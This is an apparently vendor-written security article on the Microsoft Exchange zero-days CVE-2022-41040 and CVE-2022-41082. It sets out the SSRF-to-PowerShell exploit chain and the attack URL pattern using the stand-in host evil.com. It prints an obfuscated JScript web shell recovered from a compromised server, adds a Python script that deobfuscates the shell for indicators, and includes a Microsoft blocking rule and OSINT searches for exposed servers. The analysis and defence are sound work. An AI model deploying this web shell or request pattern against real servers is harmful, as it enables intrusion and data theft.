On September 30, 2022, Microsoft published guidance on two newly reported zero-day vulnerabilities in Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019.

This article shows how to use security OSINT tools to find servers exposed to these vulnerabilities, and walks through a case study of one exploitable server. Two vulnerabilities were disclosed: CVE-2022-41040, a server-side request forgery (SSRF) flaw, and CVE-2022-41082, which allows remote code execution (RCE) when the attacker can reach PowerShell on the server. An attacker who holds valid credentials for the target Exchange server can chain the two to execute code on it.

Outlook login screen of a service that uses an MS Exchange Server with vulnerabilities announced in MS Exchange Zero-day vulnerability

How Attackers Exploit the MS Exchange Zero-day Vulnerabilities

An attacker with credentials for any mailbox first abuses CVE-2022-41040 (CVSSv3 score 8.8), the SSRF flaw, to reach the backend PowerShell endpoint through the Internet-facing front end. They then trigger CVE-2022-41082 (CVSSv3 score 8.8) to execute code on the Exchange server, install web shells and other tooling, and use them to dump Active Directory data and exfiltrate it. Large organizations with Exchange servers exposed to the Internet are the usual targets. The malicious request takes the form ‘autodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com’. Microsoft's first recommended URL Rewrite blocking rule matched a literal ‘@’ in the raw request URI, so variants that percent-encode the ‘@’ slipped past it, which is why Microsoft later revised the rule. Once the request reaches the backend, the attacker executes code through the Exchange PowerShell remoting component.

Exploit process by hackers, used to exploit MS Zero-day vulnerabilities

Image Source : Microsoft Security, Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082

GTSC, the Vietnamese cybersecurity company that reported the flaws, observed the SSRF requests for CVE-2022-41040 in its logs and found that an obfuscated web shell (an uploaded server-side script that lets the attacker run commands) had been written to the Exchange server. The requests to the web shell carried a User-Agent string belonging to AntSword, an open-source, China-based web shell management tool, and the web shell decodes its payload with Windows code page 936, Microsoft's Simplified Chinese encoding. Both details point to a Chinese-speaking threat group. GTSC also found that RedirSuiteServiceProxy.aspx, a legitimate file shipped with Exchange, had been overwritten with the same web shell code.

# Web shell recovered from the Exchange server

<%@Page Language="Jscript"%>
 
<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('NTcyM'+'jk3O3'+'ZhciB'+'zYWZl'+''+'P'+'S'+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MQ=='))+char(51450/525)+''+''+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg=='))+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+'WFtRG'+'Z6bU8'+'xajhk'+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%>
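The web shell above hides its real code behind string concatenation: base64 fragments are interleaved with single characters produced by decimal, octal (leading 0) and hex arithmetic inside char(), plus two one-character base64 decodes. The following Python script is an added example, not code from the article or from GTSC; it tokenizes that argument (copied from the web shell above), evaluates the arithmetic with JScript's octal rule, reassembles the base64 string and decodes it with code page 936 exactly as the shell does. It assumes that JScript.NET's char(n) yields the character with code point n.

```python
import ast
import base64
import operator
import re

# Argument of the outer FromBase64String(...) in the web shell quoted above,
# copied from the page.
OBFUSCATED = (
    "'NTcyM'+'jk3O3'+'ZhciB'+'zYWZl'+''+'P'+'S'+char(837-763)"
    "+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MQ=='))"
    "+char(51450/525)+''+''+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)"
    "+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg=='))"
    "+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+'WFtRG'+'Z6bU8'+'xajhk'"
    "+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+''"
)

# The three kinds of term the shell concatenates with '+'.
TOKEN = re.compile(
    r"'(?P<lit>[^']*)'"                                   # string literal
    r"|char\((?P<arith>[^()]+)\)"                         # char(<arithmetic>)
    r"|System\.Text\.Encoding\.GetEncoding\((?P<cp>\d+)\)"
    r"\.GetString\(System\.Convert\.FromBase64String\('(?P<b64>[^']*)'\)\)"
)

_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv}


def jscript_arith(expr):
    """Evaluate a JScript numeric expression built only from literals and + - * /.
    JScript reads a leading-zero literal as octal, so rewrite it for Python's parser;
    the AST walk refuses anything other than numbers and those four operators."""
    expr = re.sub(r"\b0([0-7]+)\b", r"0o\1", expr)

    def ev(node):
        if isinstance(node, ast.Expression):
            return ev(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](ev(node.left), ev(node.right))
        raise ValueError(f"unsupported syntax in {expr!r}")

    value = ev(ast.parse(expr, mode="eval"))
    if value != int(value):
        raise ValueError(f"{expr!r} does not evaluate to a code point")
    return int(value)


def deobfuscate(expr):
    """Rebuild the concatenated base64 string, then decode it the way the shell does."""
    parts, pos = [], 0
    while pos < len(expr):
        if expr[pos] in "+ ":            # '+' only separates terms outside quotes
            pos += 1
            continue
        m = TOKEN.match(expr, pos)
        if not m:
            raise ValueError(f"unrecognised token at offset {pos}: {expr[pos:pos + 20]!r}")
        if m.group("lit") is not None:
            parts.append(m.group("lit"))
        elif m.group("arith") is not None:
            parts.append(chr(jscript_arith(m.group("arith"))))
        else:                            # nested GetEncoding(cp).GetString(FromBase64String(..))
            parts.append(base64.b64decode(m.group("b64")).decode(f"cp{m.group('cp')}"))
        pos = m.end()
    return base64.b64decode("".join(parts)).decode("cp936")


def extract_parameter_name(plaintext):
    """The POST parameter the shell passes to eval(); a usable IOC for request logs."""
    m = re.search(r"Request\.Item\['([^']+)'\]", plaintext)
    return m.group(1) if m else None


if __name__ == "__main__":
    plain = deobfuscate(OBFUSCATED)
    print(plain)
    print("parameter name:", extract_parameter_name(plain))
```

The recovered script is a one-line eval of whatever arrives in a single request parameter, bracketed by two meaningless integer literals; the parameter name it reveals is the value to hunt for in IIS logs and captured POST bodies on other servers. The arithmetic is evaluated through a restricted AST walk rather than eval() so the tool can be pointed at untrusted samples.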

Detect Exploitable MS Exchange Servers using OSINT Tools

Exchange servers affected by the MS Exchange zero-day vulnerabilities can be identified with Criminal IP (https://www.criminalip.io) by searching with the cve_id filter for CVE-2022-41082. At the time of writing, that search returned 91,807 IP addresses hosting vulnerable Exchange servers.

Search Query : cve_id: CVE-2022-41082

Search results shown by searching for MS Exchange Zero-day vulnerability with CVEs

Port statistics show that most IP addresses with these vulnerabilities expose both port 80 and port 443. Other open ports are typically variants of 443, such as 8443 and 4433.

Results shown for MS Exchange Zero-day vulnerabilities by searching with vulnerable CVEs

Furthermore, some of these IP addresses are still running in a vulnerable state and, on top of that, present weak certificates.

Server with MS Exchange vulnerability, hosted with a weak certificate

Most of the IP addresses found through Criminal IP expose the vulnerable service on ports 80 and 443, and their Inbound Score is rated Critical, which is why Criminal IP flags them as malicious. In the example below, the IP address intelligence report lists 89 exposed vulnerabilities in total, most of them unrelated to CVE-2022-41082 and CVE-2022-41040. The address is also classified as a Hosting IP, so an attacker who gains a foothold through CVE-2022-41040 and CVE-2022-41082 could pivot from it into the internal network and exfiltrate further data.

Analysis results shown for IP address of a server with MS Exchange Zero-day vulnerability. A total of 89 vulnerabilities mapped
Port and vulnerability information for IP address of a server with MS Zero-day vulnerability

How Organizations Can Respond to MS Exchange Zero-day Vulnerability Exploits

Microsoft recommends adding a URL Rewrite blocking rule in IIS Manager → Default Web Site → URL Rewrite → Actions with the pattern .*autodiscover\.json.*Powershell.* to block the known attack pattern, and its updated guidance evaluates that pattern against the URL-decoded request URI ({UrlDecode:{REQUEST_URI}}) after the original rule, which looked for a literal ‘@’, proved easy to evade. Microsoft also recommends disabling remote PowerShell access for non-administrator users. However, as with every zero-day, it is hard to know in advance how a newly disclosed vulnerability affects a given server. Security teams usually rely on vulnerability scanners to decide which hosts need action when a zero-day appears, but scanning every server in operation is difficult, and responding quickly once an attack is under way is harder still.

Check out this analysis article about the Zero-day vulnerability exploits found in June 2022 on Atlassian’s Confluence server.


Source : Criminal IP (https://www.criminalip.io)